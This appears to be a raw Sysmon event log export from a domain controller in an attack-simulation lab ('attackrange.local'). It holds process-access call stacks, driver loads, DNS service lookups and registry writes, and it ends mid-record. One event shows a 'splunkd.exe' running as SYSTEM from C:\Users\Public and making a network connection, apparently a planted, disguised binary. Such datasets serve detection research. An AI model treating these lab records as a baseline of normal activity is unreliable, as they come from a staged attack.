Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002397Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:29.097{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002396Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:29.097{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002395Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:29.097{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002394Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:29.097{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002393Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:29.097{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002392Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:29.097{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002391Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:29.097{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002390Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:29.097{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002389Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:29.097{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7C80-5FA1-7200-000000008801}4524C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002388Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:29.097{D28789B6-7C73-5FA1-3300-000000008801}26763928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7C80-5FA1-7200-000000008801}4524C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002387Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:28.915{D28789B6-7C80-5FA1-7200-000000008801}4524C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe8.0.2Monitor windows event logssplunk ApplicationSplunk Inc.splunk-winevtlog.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=A735F697C6C533F20D023E4318824194,SHA256=295236CFB06A5F9C1F76EECC468F9A070BFCB5C4E094918059EC86BBB654E119,IMPHASH=85F4904CF3562658E303E53274ABD436{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000002414Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localUsermode2020-11-03 15:51:28.673{D28789B6-7C6B-5FA1-2700-000000008801}2324C:\Users\Public\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-807.attackrange.local49694-false10.0.1.12-7010- 22542200x80000000000000002416Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:29.831{D28789B6-7C64-5FA1-1300-000000008801}1224wpad1460-C:\Windows\System32\svchost.exe 22542200x80000000000000002415Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:28.654{D28789B6-7C64-5FA1-1200-000000008801}1216NT AUTHORITY9560-C:\Windows\System32\svchost.exe 10341000x80000000000000002420Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:33.987{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 644600x80000000000000002419Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:57.191C:\Windows\System32\drivers\xenvbd.sysMD5=8278E2B5383D2F5ED2583AC10E68E82C,SHA256=31DC4BF6BD29D3AED3588FE5A843BBD6EB6FF9D835555F7107768BA5F4E4326D,IMPHASH=B32CBE28AF26D0BACA98C88509F8A67CtrueAmazon Web Services, Inc.Valid 644600x80000000000000002418Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:58.191C:\Windows\System32\drivers\xenvbd.sysMD5=8278E2B5383D2F5ED2583AC10E68E82C,SHA256=31DC4BF6BD29D3AED3588FE5A843BBD6EB6FF9D835555F7107768BA5F4E4326D,IMPHASH=B32CBE28AF26D0BACA98C88509F8A67CtrueAmazon Web Services, Inc.Valid 644600x80000000000000002417Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:57.175C:\Windows\System32\drivers\xencrsh.sysMD5=8498E8240422067AF19398BA0C9E71BD,SHA256=8763BD78E6D2A5C4974EE2C917069C212FA6B5E138B1DFAF3D923EC7BDA8CCE0,IMPHASH=5A51E368D0D191BA922C89AD12551EF4trueAmazon Web Services, Inc.Valid 22542200x80000000000000002542Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.814{D28789B6-7C64-5FA1-1300-000000008801}1224wpad9003-C:\Windows\System32\svchost.exe 22542200x80000000000000002541Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.743{D28789B6-7C73-5FA1-3700-000000008801}3084WIN-DC-8070fe80::823:2ec6:f5ff:fef1;fe80::4d6c:cfdc:29be:620c;::ffff:10.0.1.14;C:\Windows\System32\dfsrs.exe 22542200x80000000000000002540Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.735{D28789B6-7C64-5FA1-1200-000000008801}1216win-dc-807.attackrange.local0fe80::823:2ec6:f5ff:fef1;fe80::4d6c:cfdc:29be:620c;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002539Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.718{D28789B6-7C62-5FA1-0B00-000000008801}868_kpasswd._udp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002538Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.716{D28789B6-7C62-5FA1-0B00-000000008801}868_kpasswd._tcp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002537Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.714{D28789B6-7C62-5FA1-0B00-000000008801}868_kerberos._udp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002536Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.712{D28789B6-7C62-5FA1-0B00-000000008801}868_gc._tcp.Default-First-Site-Name._sites.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002535Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.710{D28789B6-7C62-5FA1-0B00-000000008801}868_gc._tcp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002534Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.708{D28789B6-7C62-5FA1-0B00-000000008801}868_kerberos._tcp.Default-First-Site-Name._sites.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002533Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.706{D28789B6-7C62-5FA1-0B00-000000008801}868_kerberos._tcp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002532Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.705{D28789B6-7C62-5FA1-0B00-000000008801}868_kerberos._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002531Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.703{D28789B6-7C62-5FA1-0B00-000000008801}868_kerberos._tcp.dc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002530Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.701{D28789B6-7C62-5FA1-0B00-000000008801}868gc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002529Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.699{D28789B6-7C62-5FA1-0B00-000000008801}868_ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002528Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.698{D28789B6-7C62-5FA1-0B00-000000008801}868_ldap._tcp.gc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002527Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.695{D28789B6-7C62-5FA1-0B00-000000008801}868_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002526Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.691{D28789B6-7C62-5FA1-0B00-000000008801}868_ldap._tcp.dc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002525Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.689{D28789B6-7C62-5FA1-0B00-000000008801}868_msdcs.attackrange.local.0type: 2 win-dc-807.attackrange.local;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002524Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.687{D28789B6-7C62-5FA1-0B00-000000008801}868_msdcs.attackrange.local.0type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002523Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.686{D28789B6-7C62-5FA1-0B00-000000008801}8689a2082f6-6f85-4d0d-97f4-787c9c356dbb._msdcs.attackrange.local.0type: 5 win-dc-807.attackrange.local;C:\Windows\System32\lsass.exe 22542200x80000000000000002522Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.682{D28789B6-7C62-5FA1-0B00-000000008801}868_ldap._tcp.d059e8fc-db66-4941-b3f6-16ac18566695.domains._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002521Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.680{D28789B6-7C62-5FA1-0B00-000000008801}868_ldap._tcp.pdc._msdcs.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002520Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.679{D28789B6-7C80-5FA1-7200-000000008801}4524win-dc-807.attackrange.local0fe80::4d6c:cfdc:29be:620c;::ffff:10.0.1.14;C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe 22542200x80000000000000002519Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.679{D28789B6-7C64-5FA1-1000-000000008801}1144win-dc-807.attackrange.local0fe80::4d6c:cfdc:29be:620c;::ffff:10.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002518Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.677{D28789B6-7C62-5FA1-0B00-000000008801}868_ldap._tcp.Default-First-Site-Name._sites.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002517Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.676{D28789B6-7C73-5FA1-3400-000000008801}2168attackrange.local0type: 6 ;10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000002516Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.676{D28789B6-7C64-5FA1-1500-000000008801}1336eu-central-1.compute.internal9501-C:\Windows\System32\svchost.exe 22542200x80000000000000002515Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.674{D28789B6-7C64-5FA1-1000-000000008801}1144win10.ipv6.microsoft.com.0type: 5 onpremwindows.ipv6.microsoft.com.akadns.net;type: 5 trdovmssukwest.ipv6.microsoft.com.akadns.net;40.81.120.44;C:\Windows\System32\svchost.exe 22542200x80000000000000002514Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.674{D28789B6-7C62-5FA1-0B00-000000008801}868_ldap._tcp.attackrange.local.9501type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002513Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.673{D28789B6-7C73-5FA1-3700-000000008801}3084win-dc-807.attackrange.local0fe80::4d6c:cfdc:29be:620c;::ffff:10.0.1.14;C:\Windows\System32\dfsrs.exe 22542200x80000000000000002512Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.672{D28789B6-7C73-5FA1-3400-000000008801}2168attackrange.local0type: 2 win-dc-807.attackrange.local;10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000002511Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.672{D28789B6-7C62-5FA1-0B00-000000008801}868win-dc-807.attackrange.local0fe80::4d6c:cfdc:29be:620c;::ffff:10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002510Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.671{D28789B6-7C62-5FA1-0B00-000000008801}868_ldap._tcp.d059e8fc-db66-4941-b3f6-16ac18566695.domains._msdcs.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002509Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.671{D28789B6-7C62-5FA1-0B00-000000008801}868_kerberos._tcp.dc._msdcs.ATTACKRANGE.LOCAL.0type: 33 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002508Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.671{D28789B6-7C73-5FA1-3400-000000008801}2168win-dc-807.attackrange.local9501type: 6 ;10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000002507Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.670{D28789B6-7C62-5FA1-0B00-000000008801}868attackrange.local.0type: 6 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002506Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.670{D28789B6-7C64-5FA1-1500-000000008801}1336attackrange.local010.0.1.14;C:\Windows\System32\svchost.exe 22542200x80000000000000002505Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.670{D28789B6-7C62-5FA1-0B00-000000008801}868_ldap._tcp.dc._msdcs.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002504Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.670{D28789B6-7C62-5FA1-0B00-000000008801}868_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.0type: 33 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002503Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.670{D28789B6-7C62-5FA1-0B00-000000008801}868_kerberos._tcp.Default-First-Site-Name._sites.dc._msdcs.ATTACKRANGE.LOCAL.0type: 33 ;10.0.1.14;C:\Windows\System32\lsass.exe 22542200x80000000000000002502Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.659{D28789B6-7C64-5FA1-1500-000000008801}1336_ldap._tcp.gc._msdcs.attackrange.local.1460-C:\Windows\System32\svchost.exe 22542200x80000000000000002501Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.258{D28789B6-7C73-5FA1-3400-000000008801}2168win-dc-807.attackrange.local0fe80::4d6c:cfdc:29be:620c;::ffff:10.0.1.14;C:\Windows\System32\dns.exe 22542200x80000000000000002500Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:40.257{D28789B6-7C62-5FA1-0B00-000000008801}868WIN-DC-8070fe80::4d6c:cfdc:29be:620c;::ffff:10.0.1.14;C:\Windows\System32\lsass.exe 13241300x80000000000000002499Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-SetValue2020-11-03 15:51:40.940{D28789B6-7C64-5FA1-1300-000000008801}1224C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{719FB519-2998-4038-9070-C096A1BDBCC9}\DateLastConnectedBinary Data 13241300x80000000000000002498Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-SetValue2020-11-03 15:51:40.940{D28789B6-7C64-5FA1-1300-000000008801}1224C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{719FB519-2998-4038-9070-C096A1BDBCC9}\NameTypeDWORD (0x00000006) 13241300x80000000000000002497Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-SetValue2020-11-03 15:51:40.940{D28789B6-7C64-5FA1-1300-000000008801}1224C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{719FB519-2998-4038-9070-C096A1BDBCC9}\DateCreatedBinary Data 13241300x80000000000000002496Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-SetValue2020-11-03 15:51:40.940{D28789B6-7C64-5FA1-1300-000000008801}1224C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows 